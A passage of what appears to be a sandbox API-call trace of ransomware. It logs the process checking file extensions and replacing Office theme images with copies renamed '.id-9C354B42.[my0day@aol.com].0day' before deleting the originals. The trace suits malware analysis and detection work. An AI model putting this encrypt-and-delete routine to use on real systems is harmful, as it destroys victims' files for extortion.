Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString=".doc") returned 4 [0044.625] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.625] lstrlenW (lpString=".docx") returned 5 [0044.625] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.625] lstrlenW (lpString=".pdf") returned 4 [0044.625] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.625] lstrlenW (lpString=".xls") returned 4 [0044.625] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.625] lstrlenW (lpString=".xlsx") returned 5 [0044.625] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.625] lstrlenW (lpString=".ppt") returned 4 [0044.625] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString=".zip") returned 4 [0044.625] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.625] lstrlenW (lpString=".rar") returned 4 [0044.625] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.625] lstrlenW (lpString=".bz2") returned 4 [0044.625] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.625] lstrlenW (lpString=".7z") returned 3 [0044.625] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString=".dbf") returned 4 [0044.625] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString=".1cd") returned 4 [0044.625] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString=".jpg") returned 4 [0044.626] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString=".doc") returned 4 [0044.626] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString=".docx") returned 5 [0044.626] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.626] lstrlenW (lpString=".pdf") returned 4 [0044.626] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString=".xls") returned 4 [0044.626] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.626] lstrlenW (lpString=".xlsx") returned 5 [0044.626] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.626] lstrlenW (lpString=".ppt") returned 4 [0044.626] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString=".zip") returned 4 [0044.626] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.626] lstrlenW (lpString=".rar") returned 4 [0044.626] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.626] lstrlenW (lpString=".bz2") returned 4 [0044.626] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString=".7z") returned 3 [0044.626] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString=".dbf") returned 4 [0044.626] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString=".1cd") returned 4 [0044.626] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.626] lstrlenW (lpString=".jpg") returned 4 [0044.626] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.627] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.627] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.627] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1363) returned 1 [0044.627] CloseHandle (hObject=0x1fc) returned 1 [0044.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20 [0044.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.627] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.627] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.629] GetLastError () returned 0x0 [0044.629] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x553, lpOverlapped=0x0) returned 1 [0044.631] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x560, lpOverlapped=0x0) returned 1 [0044.632] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.632] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.632] SetEndOfFile (hFile=0x20c) returned 1 [0044.632] CloseHandle (hObject=0x20c) returned 1 [0044.632] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.632] SetEndOfFile (hFile=0x1fc) returned 1 [0044.633] CloseHandle (hObject=0x1fc) returned 1 [0044.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.633] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 1 [0044.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.633] lstrlenW (lpString=".doc") returned 4 [0044.633] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.634] lstrlenW (lpString=".docx") returned 5 [0044.634] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.634] lstrlenW (lpString=".pdf") returned 4 [0044.634] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString=".xls") returned 4 [0044.634] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString=".xlsx") returned 5 [0044.634] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.634] lstrlenW (lpString=".ppt") returned 4 [0044.634] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString=".zip") returned 4 [0044.634] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString=".rar") returned 4 [0044.634] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString=".bz2") returned 4 [0044.634] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.634] lstrlenW (lpString=".7z") returned 3 [0044.634] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString=".dbf") returned 4 [0044.634] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString=".1cd") returned 4 [0044.634] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString=".jpg") returned 4 [0044.634] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.634] lstrlenW (lpString=".doc") returned 4 [0044.634] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.634] lstrlenW (lpString=".docx") returned 5 [0044.634] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.635] lstrlenW (lpString=".pdf") returned 4 [0044.635] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.635] lstrlenW (lpString=".xls") returned 4 [0044.635] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.635] lstrlenW (lpString=".xlsx") returned 5 [0044.635] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.635] lstrlenW (lpString=".ppt") returned 4 [0044.635] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.635] lstrlenW (lpString=".zip") returned 4 [0044.635] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.635] lstrlenW (lpString=".rar") returned 4 [0044.635] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.635] lstrlenW (lpString=".bz2") returned 4 [0044.635] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.635] lstrlenW (lpString=".7z") returned 3 [0044.635] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.635] lstrlenW (lpString=".dbf") returned 4 [0044.635] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.635] lstrlenW (lpString=".1cd") returned 4 [0044.635] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.635] lstrlenW (lpString=".jpg") returned 4 [0044.635] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.635] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.635] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.636] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=20371) returned 1 [0044.636] CloseHandle (hObject=0x1fc) returned 1 [0044.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20 [0044.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.636] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.636] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.637] GetLastError () returned 0x0 [0044.637] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x4f93, lpOverlapped=0x0) returned 1 [0044.639] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x4fa0, lpOverlapped=0x0) returned 1 [0044.640] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.640] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.640] SetEndOfFile (hFile=0x20c) returned 1 [0044.640] CloseHandle (hObject=0x20c) returned 1 [0044.640] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.640] SetEndOfFile (hFile=0x1fc) returned 1 [0044.641] CloseHandle (hObject=0x1fc) returned 1 [0044.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.641] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString=".doc") returned 4 [0044.642] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.642] lstrlenW (lpString=".docx") returned 5 [0044.642] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.642] lstrlenW (lpString=".pdf") returned 4 [0044.642] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.642] lstrlenW (lpString=".xls") returned 4 [0044.642] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.642] lstrlenW (lpString=".xlsx") returned 5 [0044.642] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.642] lstrlenW (lpString=".ppt") returned 4 [0044.642] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString=".zip") returned 4 [0044.642] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.642] lstrlenW (lpString=".rar") returned 4 [0044.642] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.642] lstrlenW (lpString=".bz2") returned 4 [0044.642] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.642] lstrlenW (lpString=".7z") returned 3 [0044.642] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString=".dbf") returned 4 [0044.642] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString=".1cd") returned 4 [0044.642] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.642] lstrlenW (lpString=".jpg") returned 4 [0044.642] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString=".doc") returned 4 [0044.643] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString=".docx") returned 5 [0044.643] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.643] lstrlenW (lpString=".pdf") returned 4 [0044.643] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString=".xls") returned 4 [0044.643] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.643] lstrlenW (lpString=".xlsx") returned 5 [0044.643] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.643] lstrlenW (lpString=".ppt") returned 4 [0044.643] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString=".zip") returned 4 [0044.643] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.643] lstrlenW (lpString=".rar") returned 4 [0044.643] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.643] lstrlenW (lpString=".bz2") returned 4 [0044.643] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString=".7z") returned 3 [0044.643] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString=".dbf") returned 4 [0044.643] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString=".1cd") returned 4 [0044.643] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0044.643] lstrlenW (lpString=".jpg") returned 4 [0044.644] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.644] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.644] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.644] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1293) returned 1 [0044.644] CloseHandle (hObject=0x1fc) returned 1 [0044.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 0x20 [0044.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.644] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.644] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.646] GetLastError () returned 0x0 [0044.646] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x50d, lpOverlapped=0x0) returned 1 [0044.648] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x510, lpOverlapped=0x0) returned 1 [0044.649] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.649] WriteFile (in: hFile=0x20c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.649] SetEndOfFile (hFile=0x20c) returned 1 [0044.649] CloseHandle (hObject=0x20c) returned 1 [0044.649] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.649] SetEndOfFile (hFile=0x1fc) returned 1 [0044.650] CloseHandle (hObject=0x1fc) returned 1 [0044.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.650] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif")) returned 1 [0044.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 75 [0044.650] 